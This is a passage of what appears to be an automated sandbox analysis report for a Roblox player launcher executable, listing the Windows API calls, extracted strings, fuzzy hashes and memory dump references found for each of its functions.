              • Instruction Fuzzy Hash: 1601D8377122155FDF168F79EC40ADA33A6EBD53607298121FD25CB158EA31D881C791
              APIs
              • RtlAllocateHeap.NTDLL(00000008,?,?,?,00A19DA1,00000001,00000364,?,00000006,000000FF,?,00A05529,00B47218,0000000C), ref: 00A1A2DC
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: cbd9ae37e759fe6b7e8f83093c93c9bcba01c549001da484acb5c95d500a53d0
              • Instruction ID: a27d0a744a43b8d9e65112d378cef025f6b9009a4d35a49d4bfd38ebf3ef9298
              • Opcode Fuzzy Hash: cbd9ae37e759fe6b7e8f83093c93c9bcba01c549001da484acb5c95d500a53d0
              • Instruction Fuzzy Hash: 19F0E9326462246BDB215B669D01BDB375CEFA5770F148122BC04970A1CB72DCC186E6
              APIs
              • RtlAllocateHeap.NTDLL(00000000,00A053D6,00A19E0E,?,00A137ED,00B474D8,00000018,00000003), ref: 00A1A32A
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: 4aa2cc4699f92b0c95fdabe28bf67f74c7848ea9452648183badc3c623f0ff03
              • Instruction ID: 0c27dd24c3157f9acd721d8779196da8dcd474ae44e4d8d64afae9e4d7ba7471
              • Opcode Fuzzy Hash: 4aa2cc4699f92b0c95fdabe28bf67f74c7848ea9452648183badc3c623f0ff03
              • Instruction Fuzzy Hash: A8E0E53D6062215BD6302BAA9D00BDB365CEF613F0F144121BC219B0C1CB20CC8141E7
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: H_prolog3
              • String ID:
              • API String ID: 431132790-0
              • Opcode ID: b922c9579dd5b34488ea0d5898c1d33375b5e33d0c8a12c44c1013db59866f3d
              • Instruction ID: 925cb56afe998688b363f45819e551665b41c3fba622edb0eedd23095eef86ec
              • Opcode Fuzzy Hash: b922c9579dd5b34488ea0d5898c1d33375b5e33d0c8a12c44c1013db59866f3d
              • Instruction Fuzzy Hash: 54E01A72C1020E9BCF00DFE8C542BEFB7B8AF08300F508026A211E7140EB3893858BA1
              APIs
              • Concurrency::cancel_current_task.LIBCPMT ref: 0073B03E
                • Part of subcall function 0073D2E0: GetLastError.KERNEL32 ref: 0073D2FB
              • CoCreateInstance.OLE32(00B15228,00000000,00000001,00A96CCC,?,CLSID_ShellLink failed), ref: 0073B280
              • DeleteFileW.KERNEL32(?), ref: 0073B2C9
                • Part of subcall function 0071B180: ___std_exception_copy.LIBVCRUNTIME ref: 0071B1AB
                • Part of subcall function 009F7461: RaiseException.KERNEL32(E06D7363,00000001,00000003,009E35B6,009E35B6,?,009E20DC,009E35B6,00B45B84,00000000,009E35B6,00000000,015B8558,009E3588,00000006), ref: 009F74C1
                • Part of subcall function 0071E0F0: GetLastError.KERNEL32(0073CD66,00B314CC,0073CD66,?,0073CD66,80004005), ref: 0071E110
              Strings
              • Error closing dstFile='%s' during copy: %s, xrefs: 0073AF5C
              • CLSID_ShellLink failed, xrefs: 0073B265
              • psl->SetPath failed, xrefs: 0073B294
              • Error with seekg to beginning on srcFile='%s' during copy: %s, xrefs: 0073AC4E
              • Ver, xrefs: 0073A6B6
              • psl->SetArguments failed, xrefs: 0073B2B3
              • ios_base::badbit set, xrefs: 0073AE30, 0073AE59, 0073AF1B
              • IPersistFile Save failed, xrefs: 0073B2FE
              • Failed to create Shortcuts folder, xrefs: 0073B398
              • ios_base::failbit set, xrefs: 0073AE3A
              • Error opening srcFile='%s' for copy: %s, xrefs: 0073B010
              • ios_base::eofbit set, xrefs: 0073AE3F
              • Error closing srcFile='%s' during copy: %s, xrefs: 0073AEA3
              • Error reading srcFile='%s' during copy: %s, xrefs: 0073AD43
              • Error opening dstFile='%s' for copy: %s, xrefs: 0073AA89
              • Error writing dstFile='%s' during copy: %s, xrefs: 0073ADBC
              • Error with tellg on srcFile='%s' during copy: %s, xrefs: 0073ABD5
              • cur, xrefs: 0073A6E0
              • Error with seekg to end on srcFile='%s' during copy: %s, xrefs: 0073AAE0
              • IID_IPersistFile failed, xrefs: 0073B2DC
              • %s%s.lnk, xrefs: 0073B171
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ErrorLast$Concurrency::cancel_current_taskCreateDeleteExceptionFileInstanceRaise___std_exception_copy
              • String ID: %s%s.lnk$CLSID_ShellLink failed$Error closing dstFile='%s' during copy: %s$Error closing srcFile='%s' during copy: %s$Error opening dstFile='%s' for copy: %s$Error opening srcFile='%s' for copy: %s$Error reading srcFile='%s' during copy: %s$Error with seekg to beginning on srcFile='%s' during copy: %s$Error with seekg to end on srcFile='%s' during copy: %s$Error with tellg on srcFile='%s' during copy: %s$Error writing dstFile='%s' during copy: %s$Failed to create Shortcuts folder$IID_IPersistFile failed$IPersistFile Save failed$Ver$cur$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$psl->SetArguments failed$psl->SetPath failed
              • API String ID: 3040415690-3294270231
              • Opcode ID: 090ab44c622468010153a8f9557983a42ea75a41f1d85ddde76f4af946ea1e96
              • Instruction ID: fc6f6bb1e73a3e714966065f39dfcde07aff198e1d923203417c54cbfd987968
              • Opcode Fuzzy Hash: 090ab44c622468010153a8f9557983a42ea75a41f1d85ddde76f4af946ea1e96
              • Instruction Fuzzy Hash: 53821471D00248EBEF14DFA8DD4ABEEBBB5FF44304F144158E409A7292E779AA44CB91
              APIs
              • FormatMessageW.KERNEL32(000012FF,00000000,?,00000000,?,00000100,00000000), ref: 00A28206
              • GetLastError.KERNEL32(?), ref: 00A2829F
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ErrorFormatLastMessage
              • String ID: $%s (%u)$Error %u while retrieving error %u
              • API String ID: 3479602957-4153721329
              • Opcode ID: 632fe6495deafd15b908abfdaf69953e10893ced9f768c69daff15e5d4e1a13b
              • Instruction ID: 158fa50e2702cd15c3c3363866517fd3073ddcc2e16b8339a00c7f3b9f564252
              • Opcode Fuzzy Hash: 632fe6495deafd15b908abfdaf69953e10893ced9f768c69daff15e5d4e1a13b
              • Instruction Fuzzy Hash: 20312C71A022289BDB14EB2CED4ABEE7368EF45700F1045B5F916D7282DF35AE81CB51
              APIs
              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00834AD8
              • Process32First.KERNEL32(00000000,?), ref: 00834B1F
              • Process32Next.KERNEL32(00000000,?), ref: 00834C08
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Process32$CreateFirstNextSnapshotToolhelp32
              • String ID:
              • API String ID: 1238713047-0
              • Opcode ID: 805d4696f3c1f5c36358d7b35552d6d4cb5c400d482eaccdca44260d89ebb838
              • Instruction ID: 151abd51bf9ded08f95fa0a0a8b9330f6b88ff376cbe38cfb0173a601c6cad94
              • Opcode Fuzzy Hash: 805d4696f3c1f5c36358d7b35552d6d4cb5c400d482eaccdca44260d89ebb838
              • Instruction Fuzzy Hash: 7251AC71A01219DBCB10CF99D9847AEF7B5FBC5320F149199E818AB390D374AE41CBE0
              APIs
              • LoadResource.KERNEL32(8007000E,?,?,?,8007000E,00736F72), ref: 0073733A
              • LockResource.KERNEL32(00000000,?,8007000E,00736F72), ref: 00737345
              • SizeofResource.KERNEL32(8007000E,?,?,8007000E,00736F72), ref: 00737357
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Resource$LoadLockSizeof
              • String ID:
              • API String ID: 2853612939-0
              • Opcode ID: c2e541cdfd06f5ffb3be3f99f661a4707b97dbece3a6692202dc1800023f2480
              • Instruction ID: ce1046f78571e4838387e361df01f5622ace09ef0300933fc8c44acfcacda4da
              • Opcode Fuzzy Hash: c2e541cdfd06f5ffb3be3f99f661a4707b97dbece3a6692202dc1800023f2480
              • Instruction Fuzzy Hash: DBF022368042A6E7DF391F98DC040AD7B64EB40351B004A26FD09C7021E3368D50E7C0
              APIs
              • LoadLibraryW.KERNEL32(?,?,?,008B1998,kernel32.dll,::GetNamedPipeClientProcessId,00000000,?,00000000,?,74DEE010), ref: 008A9D5B
              • GetProcAddress.KERNEL32(00000000,?), ref: 008A9D87
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID:
              • API String ID: 2574300362-0
              • Opcode ID: 032512532da8536f523e71ab15d8184480759ef60e60757b7650a298f39892f5
              • Instruction ID: 83d3ef5f5f33e410f8b589a7b90a6b1f8200573d31a450c983bdec1c5927e0ed
              • Opcode Fuzzy Hash: 032512532da8536f523e71ab15d8184480759ef60e60757b7650a298f39892f5
              • Instruction Fuzzy Hash: 77E0E529A083595BEB319E9498146E7BBEDEB8B399F10C859E9DCC3501E631EC848390
              APIs
              • GetModuleHandleW.KERNEL32(00000000,00000000,?), ref: 00776DC8
              • GetModuleHandleW.KERNEL32(?), ref: 00776DCF
              • FormatMessageW.KERNEL32(000013FF,00000000,?,?,?), ref: 00776E12
              • FormatMessageW.KERNEL32(000013FF,?,?,?,?,00000000,00000000), ref: 00776E3A
              • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00776E67
              • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00776E79
              • LocalFree.KERNEL32(?,?,?), ref: 0077713C
              • LocalFree.KERNEL32(?,?,?), ref: 007771D2
              Strings
              • An error occurred in the secure channel support., xrefs: 00776E71
              • , xrefs: 007770AD
              • The operation timed out., xrefs: 00776E83
              • Unknown error code 0x{:08x}., xrefs: 00776F06
              • A connection with the server could not be established., xrefs: 00776E5F
              • The server name or address could not be resolved., xrefs: 00776E95
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
